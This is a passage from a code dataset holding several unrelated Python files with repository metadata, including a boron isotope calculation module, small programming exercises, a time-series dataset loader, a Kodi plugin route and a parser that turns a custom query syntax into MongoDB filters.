\"\"\"\n Convert isotope ratio (R11) to delta notation (d11).\n\n Parameters\n 
----------\n R11 : array-like\n The isotope ratio (11B/10B).\n SRM_ratio : float, optional\n The 11B/10B of the SRM, by default NIST951 which is 4.04367\n\n Returns\n -------\n array-like\n R11 expressed in delta notation (d11).\n \"\"\"\n return (R11 / SRM_ratio - 1) * 1000\n\ndef R11_to_A11(R11):\n \"\"\"\n Convert isotope ratio (R11) to fractional abundance (A11).\n\n Parameters\n ----------\n R11 : array-like\n The isotope ratio (11B/10B).\n\n Returns\n -------\n array-like\n R11 expressed as fractional abundance (A11).\n \"\"\"\n return R11 / (1 + R11)\n\n# Alpha Converters\ndef ABO3_to_ABO4(ABO3,alphaB):\n \"\"\"\n Converts isotope fractional abundance of boric acid to isotope fraction abundance of borate ion\n\n Parameters\n ----------\n ABO3 : array-like\n The fractional abundance of boric acid (B(OH)3)\n alphaB : array-like\n The isotope fractionation factor for (11/10 BO3)/(11/10 BO4).\n\n Returns\n -------\n array-like\n ABO4 - the fractional abundance of borate ion (B(OH)4)\n \"\"\"\n return (1 / ((alphaB / ABO3) - alphaB + 1) )\n\ndef ABO3_or_ABO4(ABO3,ABO4,alphaB):\n \"\"\"\n Helper function to determine ABO4 if ABO3 is None\n\n Parameters\n ----------\n ABO3 : array-like\n The fractional abundance of boric acid (B(OH)3)\n ABO4 : array-like\n The fractional abundance of borate ion (B(OH)4)\n alphaB : array-like\n The isotope fractionation factor for (11/10 BO3)/(11/10 BO4).\n\n Returns\n -------\n array-like\n ABO4 - the fractional abundance of borate ion (B(OH)4)\n \"\"\"\n if NnotNone(ABO3, ABO4) < 1:\n raise(ValueError(\"Either ABO4 or ABO3 must be specified\"))\n elif ABO4 is None:\n ABO4 = ABO3_to_ABO4(ABO3,alphaB)\n return ABO4\n\n\n# Base Functions\n# Calculate total boron isotope fractional abundance using borate ion (B(OH)4)\ndef calculate_ABT(H, Ks, alphaB, ABO4=None, ABO3=None):\n \"\"\"\n Calculate ABT from pH (total scale) and ABO4 or ABO3.\n\n Parameters\n ---------- \n Ks : dict\n A dictionary of stoichiometric equilibrium constants.\n pH : array-like\n pH on the Total scale\n alphaB : array-like\n The fractionation factor between B(OH)3 and B(OH)4-\n ABO4 : array-like\n The fractional abundance of 11B in B(OH)4.\n ABO3 : array-like\n The fractional abundance of 11B in B(OH)3.\n\n Returns\n -------\n array-like\n The fractional abundance of 11B in total B (ABT).\n \"\"\"\n ABO4 = ABO3_or_ABO4(ABO3,ABO4,alphaB)\n\n chiB = chiB_calc(H, Ks)\n return (\n ABO4\n * (\n -ABO4 * alphaB * chiB\n + ABO4 * alphaB\n + ABO4 * chiB\n - ABO4\n + alphaB * chiB\n - chiB\n + 1\n )\n / (ABO4 * alphaB - ABO4 + 1))\n\n# Calculate pH using isotope fractional abundance of borate ion (B(OH)4)\ndef calculate_H(Ks, alphaB, ABT, ABO4=None, ABO3=None):\n \"\"\"\n Calculate H from ABO4 or ABO3 and ABT. 
\n\n Parameters\n ----------\n Ks : dict\n dictionary of speciation constants\n alphaB : float or array-like\n fractionation factor between B(OH)3 and B(OH)4-\n ABT : float or array-like\n fractional abundance of 11B in total B\n ABO4 : float or array-like\n fractional abundance of 11B in B(OH)4-\n \n Returns\n -------\n array-like\n pH on the total scale.\n \"\"\"\n ABO4 = ABO3_or_ABO4(ABO3,ABO4,alphaB)\n\n return (Ks.KB / ((alphaB / (1 - ABO4 + alphaB * ABO4) - 1) / (ABT / ABO4 - 1) - 1))\n\n# Calculate isotope fractional abundance of boric acid (B(OH)3)\ndef calculate_ABO3(H, Ks, ABT, alphaB):\n \"\"\"\n Calculate ABO3 from H and ABT\n\n Parameters\n ----------\n Ks : dict\n A dictionary of stoichiometric equilibrium constants.\n H : array-like\n The activity of Hydrogen ions in mol kg-1\n ABT : array-like\n The fractional abundance of 11B in total B.\n alphaB : array-like\n The fractionation factor between B(OH)3 and B(OH)4-\n\n Returns\n -------\n array-like\n The fractional abundance of 11B in B(OH)3.\n \"\"\"\n chiB = chiB_calc(H, Ks)\n return (\n ABT * alphaB\n - ABT\n + alphaB * chiB\n - chiB\n - np.sqrt(\n ABT ** 2 * alphaB ** 2\n - 2 * ABT ** 2 * alphaB\n + ABT ** 2\n - 2 * ABT * alphaB ** 2 * chiB\n + 2 * ABT * alphaB\n + 2 * ABT * chiB\n - 2 * ABT\n + alphaB ** 2 * chiB ** 2\n - 2 * alphaB * chiB ** 2\n + 2 * alphaB * chiB\n + chiB ** 2\n - 2 * chiB\n + 1\n )\n + 1\n ) / (2 * chiB * (alphaB - 1))\n\n# Calculate isotope fractional abundance of borate ion (B(OH)4)\ndef calculate_ABO4(H, Ks, ABT, alphaB):\n \"\"\"\n Calculate ABO4 from H and ABT\n\n Parameters\n ----------\n Ks : dict\n Dictionary of stoichiometric equilibrium constants.\n H : array-like\n The activity of Hydrogen ions in mol kg-1\n ABT : array-like\n The fractional abundance of 11B in total B.\n alphaB : array-like\n The fractionation factor between B(OH)3 and B(OH)4-\n\n Returns\n -------\n array-like\n The fractional abundance of 11B in B(OH)4-\n \"\"\"\n chiB = chiB_calc(H, Ks)\n return -(\n ABT * alphaB\n - ABT\n - alphaB * chiB\n + chiB\n + np.sqrt(\n ABT ** 2 * alphaB ** 2\n - 2 * ABT ** 2 * alphaB\n + ABT ** 2\n - 2 * ABT * alphaB ** 2 * chiB\n + 2 * ABT * alphaB\n + 2 * ABT * chiB\n - 2 * ABT\n + alphaB ** 2 * chiB ** 2\n - 2 * alphaB * chiB ** 2\n + 2 * alphaB * chiB\n + chiB ** 2\n - 2 * chiB\n + 1\n )\n - 1\n ) / (2 * alphaB * chiB - 2 * alphaB - 2 * chiB + 2)\n\n# Calculate alpha using isotope fractional abundance of boric acid (B(OH)3)\ndef calculate_alpha_ABO3(H, Ks, ABT, ABO3):\n \"\"\"\n Calculate fractionation factor (alpha) from the fractional abundance of 11B in B(OH)3 (ABO3)\n\n Parameters\n ----------\n Ks : dict\n Dictionary of stoichiometric equilibrium constants.\n H : array-like\n The activity of Hydrogen ions in mol kg-1\n ABT : array-like\n The fractional abundance of 11B in total B.\n ABO3 : array-like\n The fractional abundance of 11B in boric acid (B(OH)3).\n\n Returns\n -------\n array-like\n The fractionation factor between B(OH)3 and B(OH)4- (alpha)\n \"\"\"\n return ( (1\n / ((H/Ks.KB) * (ABT - ABO3) + ABT)) \n / (ABO3 -1))\n\n# Calculate alpha using isotope fractional abundance of borate ion (B(OH)4)\ndef calculate_alpha_ABO4(H, Ks, ABT, ABO4):\n \"\"\"\n Calculate fractionation factor (alpha) from the fractional abundance of 11B in B(OH)3 (ABO3)\n\n Parameters\n ----------\n Ks : dict\n Dictionary of stoichiometric equilibrium constants.\n H : array-like\n The activity of Hydrogen ions in mol kg-1\n ABT : array-like\n The fractional abundance of 11B in total B.\n ABO4 : 
array-like\n The fractional abundance of 11B in borate ion (B(OH)4).\n\n Returns\n -------\n array-like\n The fractionation factor between B(OH)3 and B(OH)4- (alpha)\n \"\"\"\n return ( (1/ABO4 - 1)\n / (1 / (ABT - ((ABO4-ABT)/(H/Ks.KB))) -1) )\n\n# Calculate alpha using isotope fractional abundance of borate ion (B(OH)4)\ndef calculate_KB(H, alphaB, ABT, ABO4=None, ABO3=None):\n \"\"\"\n Calculate stoichiometric equilibrium constant for boron\n\n Parameters\n ----------\n H : array-like\n The activity of Hydrogen ions in mol kg-1\n alphaB : array-like\n The fractionation factor between B(OH)3 and B(OH)4-\n ABT : array-like\n The fractional abundance of 11B in total B.\n ABO4 : array-like\n The fractional abundance of 11B in borate ion (B(OH)4).\n ABO3 : array-like\n The fractional abundance of 11B in boric acid (B(OH)3).\n\n Returns\n -------\n array-like\n The stoichiometric equilibrium constant for boron (KB)\n \"\"\"\n ABO4 = ABO3_or_ABO4(ABO3,ABO4,alphaB)\n return (H\n / ((ABO4 - ABT)\n / ( ABT \n - 1 / ( (1/alphaB) * (1/ABO4 -1) + 1) )))\n\ndef calc_B_isotopes(pHtot=None, ABT=None, ABO3=None, ABO4=None, alphaB=None, Ks=None, **kwargs):\n # determine pH and ABT\n if pHtot is not None: # pH is known\n H = 10**-pHtot\n if ABT is None:\n ABT = calculate_ABT(H=H, Ks=Ks, alphaB=alphaB, ABO3=ABO3, ABO4=ABO4)\n else: # pH is not known\n if ABT is not None:\n H = calculate_H(Ks=Ks, alphaB=alphaB, ABT=ABT, ABO3=ABO3, ABO4=ABO4)\n pHtot = -np.log10(H)\n else:\n raise ValueError('ABT and one of ABO3 or ABO4 must be specified if pH is missing.')\n \n if ABO3 is None:\n ABO3 = calculate_ABO3(H=H, Ks=Ks, ABT=ABT, alphaB=alphaB)\n if ABO4 is None:\n ABO4 = calculate_ABO4(H=H, Ks=Ks, ABT=ABT, alphaB=alphaB)\n \n return Bunch({\n 'pHtot': pHtot,\n 'ABT': ABT,\n 'ABO4': ABO4,\n 'ABO3': ABO3,\n 'H': H\n })\n\n# Wrapper functions using delta values\ndef calculate_pH(Ks, d11BT, d11B4, epsilon=get_epsilonB()):\n \"\"\"\n Calculates pH on the total scale\n\n Parameters\n ----------\n Ks : Bunch (dictionary with . access)\n bunch containing the boron speciation constant KB\n d11BT : float or array-like\n isotope ratio 11B/10B in total boron - delta units\n d11B4 : float or array-like\n isotope ratio 11B/10B in BO4 - delta units, in ‰\n epsilon : float or array-like\n fractionation factor between BO3 and BO4, in ‰\n\n Returns\n ----------\n array-like\n pH on the total scale\n \"\"\"\n ABO4 = d11_to_A11(d11B4)\n ABT = d11_to_A11(d11BT)\n alphaB = epsilon_to_alpha(epsilon)\n\n return -np.log10(calculate_H(Ks,alphaB,ABT,ABO4))\n\ndef calculate_pKB(pH, d11BT, d11B4, epsilonB=get_epsilonB()):\n \"\"\"\n Calculate stoichiometric equilibrium constant for boron with delta inputs\n\n Parameters\n ----------\n pH : array-like\n pH on the total scale\n d11BT : array-like\n The isotope ratio of 11B in total B in delta units, in ‰\n d11B4 : array-like\n The isotope ratio of 11B in borate ion (B(OH)4) in delta units, in ‰\n epsilonB : array-like\n The fractionation factor between B(OH)3 and B(OH)4- as delta units, in ‰\n\n Returns\n -------\n array-like\n The stoichiometric equilibrium constant for boron (KB)\n \"\"\"\n ABO4 = d11_to_A11(d11B4)\n ABT = d11_to_A11(d11BT)\n H = 10**-pH\n\n alphaB = epsilon_to_alpha(epsilonB)\n\n return -np.log10(calculate_KB(H,alphaB,ABT,ABO4))\n\ndef calculate_d11BT(pH, KB, d11B4, epsilonB=get_epsilonB()):\n \"\"\"\n Calcluates the isotope ratio of total boron in delta units\n\n Parameters\n ----------\n pH : float or array-like\n pH on the total scale\n KB : Bunch (dictionary with . 
access)\n bunch containing the boron speciation constant KB\n d11B4 : float or array-like\n isotope ratio 11B/10B in BO4 - delta units, in ‰\n epsilonB : float or array-like\n fractionation factor between BO3 and BO4, units of ‰\n\n Returns\n -------\n array-like\n The isotope ratio 11B/10B in BT - delta units (d11BT), in ‰\n \"\"\"\n ABO4 = d11_to_A11(d11B4)\n alphaB = epsilon_to_alpha(epsilonB)\n H = 10**-pH\n return A11_to_d11(calculate_ABT(H,KB,alphaB,ABO4))\n\ndef calculate_d11B4(pH, KB, d11BT, epsilonB=get_epsilonB()):\n \"\"\"\n Calculates the isotope ratio of borate ion in delta units\n\n Parameters\n ----------\n pH : float or array-like\n pH on the total scale\n KB : Bunch (dictionary with . access)\n bunch containing the boron speciation constant KB\n d11BT : float or array-like\n isotope ratio 11B/10B in total boron - delta units, in ‰\n epsilonB : float or array-like\n fractionation factor between BO3 and BO4, units of ‰\n \n Returns\n -------\n array-like\n The isotope ratio 11B/10B in BO4 - delta units, in ‰\n \"\"\"\n ABOT = d11_to_A11(d11BT)\n alphaB = epsilon_to_alpha(epsilonB)\n\n return A11_to_d11(calculate_ABO4(10**-pH,KB,ABOT,alphaB))\n\ndef calculate_epsilon(pH, KB, d11BT, d11B4):\n \"\"\"\n Returns isotope ratio of borate ion in delta units\n\n Parameters\n ----------\n pH : float or array-like\n pH on the total scale\n KB : Bunch (dictionary with . access)\n bunch containing the boron speciation constant KB\n d11BT : float or array-like\n isotope ratio 11B/10B in total boron - delta units, in ‰\n d11B4 : float or array-like\n isotope ratio 11B/10B in borate ion (B(OH)4) - delta units, in ‰\n \n Returns\n -------\n array-like\n fractionation factor between BO3 and BO4 in delta units (epsilon, in ��)\n \"\"\"\n ABO4 = d11_to_A11(d11B4)\n ABT = d11_to_A11(d11BT)\n H = 10**-pH\n\n alphaB = calculate_alpha_ABO4(H,KB,ABT,ABO4)\n\n return alpha_to_epsilon(alphaB)\n","repo_name":"oscarbranson/cbsyst","sub_path":"cbsyst/boron_isotopes.py","file_name":"boron_isotopes.py","file_ext":"py","file_size_in_byte":16135,"program_lang":"python","lang":"en","doc_type":"code","stars":24,"dataset":"github-code","pt":"37"} +{"seq_id":"70447498346","text":"import math\n\n\nclass Circle:\n\n def __init__(self, x_coordinate=0, y_coordinate=0, radius=1):\n self.x_coordinate = x_coordinate\n self.y_coordinate = y_coordinate\n self.radius = radius\n\n def get_area(self):\n print('Площадь равна:', round((self.radius * self.radius * math.pi), 2))\n\n def get_perimeter(self):\n print('Периметр равен:', round((2 * self.radius * math.pi), 2))\n\n def scale(self, x_scale):\n self.radius *= x_scale\n print(f'Окружность увеличилась в {x_scale} раз:', self.radius)\n\n def is_intersect(self, other):\n intersection = (\n (self.x_coordinate - other.x_coordinate) ** 2 + (self.y_coordinate - other.y_coordinate) ** 2 <= (\n self.radius + other.radius) ** 2)\n if intersection:\n print('Окружности пересекаются')\n else:\n print('Окружности не пересекаются')\n\n\ncircle = Circle(-2, 8, 2)\ncircle2 = Circle(9, 20, 1)\ncircle.get_area()\ncircle.scale(5)\ncircle.get_perimeter()\ncircle.is_intersect(circle2)\n\n\n","repo_name":"vladislavten/my_work2","sub_path":"Module24/03_circle/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1156,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"32441729067","text":"#Create a class and check if changing instance varibale changes class variable and create a static method to greet the programmer\nclass 
major:\n a=45\n @classmethod\n def prt(cls):\n print(cls.a)\n \n @staticmethod\n def greet():\n print(\"Good morning\")\n\nm=major()\nm.a=64\nm.prt()\nm.greet()\n","repo_name":"Souvik-223/Python-Learnings","sub_path":"Practise/Question45.py","file_name":"Question45.py","file_ext":"py","file_size_in_byte":314,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"5197145542","text":"from random import shuffle\nimport numpy as np\nimport pandas as pd\n\n\nclass Field:\n def __init__(self):\n self.length = 0\n self.st = 0\n self.ed = 0\n self.values = None\n\n\nclass TimeSeriesDataset:\n def __init__(self, para, df):\n if not isinstance(para, dict):\n raise TypeError('para must be dict like type!')\n if not isinstance(df, pd.DataFrame):\n raise TypeError('df must be DataFrame!')\n if len(df) <= 0:\n raise ValueError('df is empty!')\n\n self.timesteps = len(df)\n self.para = para\n\n x = y = z = None\n\n if 'x' not in para.keys():\n raise ValueError('x is not exist')\n if 'y' not in para.keys():\n raise ValueError('y is not exist')\n\n x = Field()\n x.length = para['x']['range'][1] - para['x']['range'][0] + 1\n x.st = para['x']['range'][0] - para['z']['range'][0] \\\n if 'z' in para.keys() and para['x']['range'][0] <= para['z']['range'][0] else 0\n x.ed = self.timesteps - (para['y']['range'][1] - para['x']['range'][0])\n x.values = df[para['x']['key']].values\n x_examples = []\n for i in range(x.st, x.ed, para['step']):\n x_examples.append(np.expand_dims(x.values[i:i + x.length], axis=0))\n x.values = np.concatenate(x_examples, axis=0)\n\n y = Field()\n y.length = para['y']['range'][1] - para['y']['range'][0] + 1\n y.st = para['y']['range'][0] - para['z']['range'][0] \\\n if 'z' in para.keys() and para['x']['range'][0] <= para['z']['range'][0] \\\n else para['y']['range'][0] - para['x']['range'][0]\n y.ed = self.timesteps - (para['y']['range'][1] - para['y']['range'][0])\n y.values = df[para['y']['key']].values\n y_examples = []\n for i in range(y.st, y.ed):\n y_examples.append(np.expand_dims(y.values[i:i + y.length], axis=0))\n y.values = np.concatenate(y_examples, axis=0)\n\n if 'z' in para.keys():\n z = Field()\n z.length = para['z']['range'][1] - para['z']['range'][0] + 1\n z.st = 0 if para['z']['range'][0] <= para['x']['range'][0] \\\n else para['z']['range'][0] - para['x']['range'][0]\n z.ed = self.timesteps - (para['y']['range'][1] - para['z']['range'][0])\n z.values = df[para['z']['key']].values\n z_examples = []\n for i in range(z.st, z.ed):\n z_examples.append(np.expand_dims(z.values[i:i + z.length], axis=0))\n z.values = np.concatenate(z_examples, axis=0)\n\n zip_list = []\n\n for i in [x, y, z]:\n if i is None:\n continue\n zip_list.append(i.values)\n\n dataset = []\n for data in zip(*zip_list):\n dataset.append(list(data))\n\n data_size = len(dataset)\n split = [int(i * data_size) for i in self.para.split]\n self.dataset = []\n for i in range(3):\n self.dataset.append(dataset[split[i]:split[i + 1]])\n\n self.train_initalizer()\n self.validation_initializer()\n self.test_initalizer()\n\n def train_initalizer(self):\n train = self.dataset[0].copy()\n if self.para['shuffle']:\n shuffle(train)\n self.train_status = {'data': train, 'idx': 0, 'epoch': 0}\n\n def validation_initializer(self):\n validation = self.dataset[1].copy()\n self.validation_status = {'data': validation, 'idx': 0, 'stop': False}\n\n def test_initalizer(self):\n test = self.dataset[2].copy()\n self.test_status = {'data': test, 'idx': 0, 'stop': False}\n\n def 
get_train_batch(self):\n batch_size = self.para['batch_size']\n idx = self.train_status['idx']\n if idx + 2 * batch_size > len(self.train_status['data']) and idx + batch_size <= len(self.train_status['data']):\n self.train_status['epoch'] += 1\n if idx + batch_size > len(self.train_status['data']):\n idx = 0\n self.train_status['data'] = self.dataset[0].copy()\n if self.para['shuffle']:\n shuffle(self.train_status['data'])\n\n data = self.train_status['data'][idx:idx + batch_size]\n self.train_status['idx'] = idx + batch_size\n batch_data = []\n for n in zip(*data):\n batch_data.append(n)\n if len(batch_data) == 2:\n x = np.concatenate([np.expand_dims(i, axis=0) for i in batch_data[0]])\n y = np.concatenate([np.expand_dims(i, axis=0) for i in batch_data[1]])\n return x, y\n if len(batch_data) == 3:\n x = np.concatenate([np.expand_dims(i, axis=0) for i in batch_data[0]])\n y = np.concatenate([np.expand_dims(i, axis=0) for i in batch_data[1]])\n z = np.concatenate([np.expand_dims(i, axis=0) for i in batch_data[2]])\n return x, y, z\n else:\n raise ValueError('label and feature numbers is not support!')\n return\n\n def get_validation_batch(self):\n batch_size = self.para['batch_size']\n idx = self.validation_status['idx']\n if idx + 2 * batch_size > len(self.validation_status['data']):\n self.validation_status['stop'] = True\n data = self.validation_status['data'][idx:idx + batch_size]\n self.validation_status['idx'] = idx + batch_size\n batch_data = []\n for n in zip(*data):\n batch_data.append(n)\n if len(batch_data) == 2:\n x = np.concatenate([np.expand_dims(i, axis=0) for i in batch_data[0]])\n y = np.concatenate([np.expand_dims(i, axis=0) for i in batch_data[1]])\n return x, y\n if len(batch_data) == 3:\n x = np.concatenate([np.expand_dims(i, axis=0) for i in batch_data[0]])\n y = np.concatenate([np.expand_dims(i, axis=0) for i in batch_data[1]])\n z = np.concatenate([np.expand_dims(i, axis=0) for i in batch_data[2]])\n return x, y, z\n else:\n raise ValueError('label and feature numbers is not support!')\n\n\nclass electricity(TimeSeriesDataset):\n def __init__(self, para, df):\n self.df = df.copy()\n input_size = df.values.shape[1]\n dat = np.zeros(df.values.shape, np.float32)\n self.scale = np.zeros(input_size, np.float32)\n self.mn = np.zeros(input_size, np.float32)\n for i in range(input_size):\n self.mn[i] = np.min(df.values[:, i])\n self.scale[i] = np.max(df.values[:, i]) - self.mn[i]\n dat[:, i] = (df.values[:, i] - self.mn[i]) / self.scale[i]\n norm_df = pd.DataFrame(dat, columns=df.columns)\n\n super(electricity, self).__init__(para, norm_df)\n\n validation = self.validation_status['data'].copy()\n y = None\n for i, val in enumerate(zip(*validation)):\n if i != 1:\n continue\n y = np.concatenate(val, axis=0)\n self.validation_rse = np.std(y * self.scale + self.mn)","repo_name":"lxyai/tpa","sub_path":"utils/timeseries.py","file_name":"timeseries.py","file_ext":"py","file_size_in_byte":6991,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"28385599118","text":"# 0 1 1 2 3 5 8\n\nn1=0\nn2=1\na=int(input(\"Enter the limit:\"))\nprint(\"Fibonnacci\")\nfor i in range(a):\n print(n1)\n sum=n1+n2\n n1=n2\n n2=sum\n\n#using while\n\nprint(\"Using while\")\nnterms=10\nn1=0\nn2=1\ncount=0\nprint(\"fibonacci sequence\")\nwhile count < nterms:\n print(n1)\n nth=n1+n2\n n1=n2\n n2=nth\n count 
+=1\n","repo_name":"SabithaSubair/Luminar_PythonDjangoProjects_May","sub_path":"samplepgms/fibonacci.py","file_name":"fibonacci.py","file_ext":"py","file_size_in_byte":325,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"38393407800","text":"# tips: 重新排序字串並作為的hashmap的key\n# O(n*klogk),若字串長度k很短,則可將klogk看作常數\nclass Solution(object):\n def groupAnagrams(self, strs):\n \"\"\"\n :type strs: List[str]\n :rtype: List[List[str]]\n \"\"\"\n group = {}\n \n for word in strs:\n sorted_word = ''.join(sorted(word))\n if sorted_word in group:\n group[sorted_word].append(word)\n else:\n group[sorted_word] = [word]\n \n return [x for x in group.values()]","repo_name":"hcygeorge/my-leetcode","sub_path":"array/medium/49. Group Anagrams.py","file_name":"49. Group Anagrams.py","file_ext":"py","file_size_in_byte":564,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"11546898608","text":"import xbmcgui # pylint: disable=import-error\nimport xbmcplugin # pylint: disable=import-error\n\nfrom ..constants import MODES\nfrom ..generators.category import category_generator\nfrom ..items.next_page import NextPage\nfrom ..lib.url_utils import create_addon_path\n\n\ndef invoke(context, page_token=''):\n payload = context.api.video_categories(page_token=page_token)\n items = list(category_generator(payload.get('items', [])))\n\n page_token = payload.get('nextPageToken')\n if page_token:\n directory = NextPage(\n label=context.i18n('Next Page'),\n path=create_addon_path({\n 'mode': str(MODES.CATEGORIES),\n 'page_token': page_token\n })\n )\n items.append(tuple(directory))\n\n if items:\n xbmcplugin.addDirectoryItems(context.handle, items, len(items))\n\n xbmcplugin.endOfDirectory(context.handle, True)\n\n else:\n xbmcgui.Dialog().notification(context.addon.getAddonInfo('name'),\n context.i18n('No entries found'),\n context.addon.getAddonInfo('icon'),\n sound=False)\n xbmcplugin.endOfDirectory(context.handle, False)\n","repo_name":"anxdpanic/plugin.video.tubed","sub_path":"resources/lib/src/routes/categories.py","file_name":"categories.py","file_ext":"py","file_size_in_byte":1246,"program_lang":"python","lang":"en","doc_type":"code","stars":48,"dataset":"github-code","pt":"37"} +{"seq_id":"4850533656","text":"# Librería numpy\r\nimport numpy as np\r\nfrom time import*\r\n\r\ndef sumD(n,A,t,x):\r\n\ts = 0\r\n\tfor i in range(0,n):\r\n\t\ts=s+A[t][i]*x[i]\r\n\treturn s\r\ndef sumI(j,n,A,t,x):\r\n\ts = 0\r\n\tif j>=n :\r\n\t\treturn 0\r\n\tfor i in range(j,n):\r\n\t\ts=s+A[i][t]*x[i]\r\n\treturn s\r\n\r\ndef sum1(i,j,A):\r\n\ts = 0\r\n\tif i==0:\r\n\t\treturn 0\r\n\tfor k in range(0,i):\r\n\t\ts=s+A[j][k]*A[i][k]\r\n\treturn s\r\n\r\ndef pivoteT(n,i,A,b):\r\n\tif i>=0 and i1:\n #Crear recursividad\n Entero(numero-1)\n #Imprimir secuencia SEGUN EL ORDEN DE LIBERACION en la memoria\n print(numero)\n \n#Llamar a la funcion\nEntero(5)\n","repo_name":"chungomovil/python","sub_path":"retomar/90_2.py","file_name":"90_2.py","file_ext":"py","file_size_in_byte":322,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"40852439084","text":"import re\n\nAUTHOR_ATTRIBUTES = [\"_id\", \"author_url\", \"name\", \"review_count\", \"image_url\", \"rating\", \n \"rating_count\", \"author_books\", \"related_authors\"]\nNUMBER_ATTRIBUTES = [\"id\", \"review_count\", \"rating\", \"rating_count\"]\nBOOK_ATTRIBUTES = [\"id\", \"book_url\", \"rating\", \"rating_count\", 
\"author\", \"author_url\",\n \"title\", \"ISBN\", \"review_count\", \"image_url\", \"similar_books\"]\nATTRIBUTES = {\"author\": AUTHOR_ATTRIBUTES, \"book\": BOOK_ATTRIBUTES}\n\n\ndef parse_whole_argument(query, error):\n ''' function that deal with whole query containing logic operator\n\n Args:\n query: query to parse\n error: string to record error\n\n Return:\n (condition for the find() function in database, table). None for invalid query\n '''\n\n and_result = re.search(\"AND\", query)\n or_result = re.search(\"OR\", query)\n not_result = re.search(\"NOT\", query)\n if and_result:\n # if nothing before AND or nothing after AND, then invalid\n if and_result.span()[0] == 0 or and_result.span()[1] == len(query):\n error.append(\"invalid AND query\")\n else:\n return parse_and(query, error)\n \n elif or_result:\n # if nothing before OR or nothing after OR, then invalid\n if or_result.span()[0] == 0 or or_result.span()[1] == len(query):\n error.append(\"invalid OR query\")\n else:\n return parse_or(query, error)\n\n \n elif not_result:\n removed_not_query = query.replace(\"NOT\", \"\", 1)\n return parse_single_query(removed_not_query, True, error)\n else:\n return parse_single_query(query, False, error)\n \n return None\n\ndef parse_single_query(query, contain_not, error):\n ''' function that parse a single query, i.e. does not contain any logic operator\n \n Args:\n query: the query to parse\n contain_not: true if the original_query contain NOT \n (NOT is removed in parse_whole_argument())\n error: string to record error\n\n Return: (condition for the find() function in database, table). None for invalid query\n '''\n \n if check_logic_operator(query):\n error.append(\"invalid query. Nested/chained operator are not supported.\")\n return None\n \n dot_result = re.search(r\"\\.\", query)\n colon_result = re.search(r\"\\:\", query)\n\n # the query is invalid if no attribute is specified\n if dot_result is None or dot_result.span()[0] == 0 or dot_result.span()[1] == len(query):\n return None\n\n table = re.split(r\"\\.\", query)[0]\n if colon_result is None:\n # output all values for the attribute if query only contains \".\"\n attribute = re.split(r\"\\.\", query)[1]\n if table not in ATTRIBUTES or attribute not in ATTRIBUTES[table]:\n error.append(\"table or attribute does not exist\")\n return None\n return ({}, {\"_id\":0, attribute: 1}, table)\n else:\n # attribute is the string between \".\" and \":\"\n attribute = re.search(r\".\\.(.*?)\\:\", query).group(1)\n # if table is not book or author or attribute does not exist, invalid\n \n if table not in ATTRIBUTES or attribute not in ATTRIBUTES[table]:\n error.append(\"table or attribute does not exist\")\n return None\n \n # check for > or <\n greater_than_result = re.search(\">\", query)\n less_than_result = re.search(\"<\", query)\n quote_result = re.search(r\"\\\"\", query)\n\n if greater_than_result:\n value = is_query_valid(query, \">\", attribute, error)\n if value:\n if contain_not: \n return ({\"$expr\": {\"$not\": {\"$gt\": \n [{ \"$toDouble\": \"$\"+ attribute}, value]}}}, table)\n return ({\"$expr\": {\"$gt\": \n [{ \"$toDouble\": \"$\"+ attribute}, value]}}, table)\n \n elif less_than_result:\n value = is_query_valid(query, \"<\", attribute, error)\n if value:\n if contain_not:\n return ({\"$expr\": {\"$not\": {\"$lt\": \n [{ \"$toDouble\": \"$\"+ attribute}, value]}}}, table)\n return ({\"$expr\": {\"$lt\":\n [{ \"$toDouble\": \"$\"+ attribute}, value]}}, table)\n\n elif quote_result:\n # check there are only two quotes if 
quotes exist\n if len(re.findall(r\"\\\"\", query)) != 2:\n error.append(\"invalid number of quotes\")\n return None\n value = is_query_valid(query, \"\\\"\", attribute, error)\n if value:\n if contain_not:\n return ({attribute: {\"$ne\": value}}, table)\n return ({attribute: value}, table)\n\n return None\n\ndef parse_and(query, error):\n ''' function that deal with whole query containing AND\n\n Args:\n query: query to parse\n error: string to record error\n\n Return:\n (condition for the find() function in database, table). None for invalid query\n '''\n\n queries = query.split(\"AND\")\n first_query_result = parse_single_query(queries[0].strip(), False, error)\n second_query_result = parse_single_query(queries[1].strip(), False, error)\n\n if first_query_result and second_query_result:\n if first_query_result[-1] == second_query_result[-1]:\n return ({\"$and\": [first_query_result[0], second_query_result[0]]},\n first_query_result[-1])\n\n error.append(\"queries separated by AND are not on the same table\")\n return None\n\n\ndef parse_or(query, error):\n ''' function that deal with whole query containing OR\n\n Args:\n query: query to parse\n error: string to record error\n \n Return:\n (condition for the find() function in database, table). None for invalid query\n '''\n\n queries = query.split(\"OR\")\n first_query_result = parse_single_query(queries[0].strip(), False, error)\n second_query_result = parse_single_query(queries[1].strip(), False, error)\n\n if first_query_result and second_query_result:\n if first_query_result[-1] == second_query_result[-1]:\n return ({\"$or\": [first_query_result[0], second_query_result[0]]},\n first_query_result[-1])\n\n error.append(\"queries separated by OR are not on the same table\")\n return None\n\n\ndef check_logic_operator(query):\n ''' check if there is a logic operator in query\n\n Args:\n query: query to check\n \n Return:\n true if query contain logic operator. false otherwise\n '''\n \n and_result = re.search(\"AND\", query)\n or_result = re.search(\"OR\", query)\n not_result = re.search(\"NOT\", query)\n if and_result or or_result or not_result:\n return True\n return False\n\n\ndef is_query_valid(query, operator, attribute, error):\n ''' check if a query is valid\n\n Args:\n query: query to check\n operator: operator used in query\n attribute: attribute of query\n error: string to record error\n\n Return:\n True if query is valid\n '''\n\n if operator == \">\" or operator == \"<\":\n if attribute not in NUMBER_ATTRIBUTES:\n error.append(\"non numerical values are not comparable\")\n return None\n value = re.split(operator, query)[1].strip()\n if len(value) != 0:\n value_is_numerical = value.replace(\".\", \"\", 1).isdigit()\n if attribute in NUMBER_ATTRIBUTES and value_is_numerical:\n return float(value)\n else:\n error.append(\"specified value is not the correct type\")\n return None\n\n 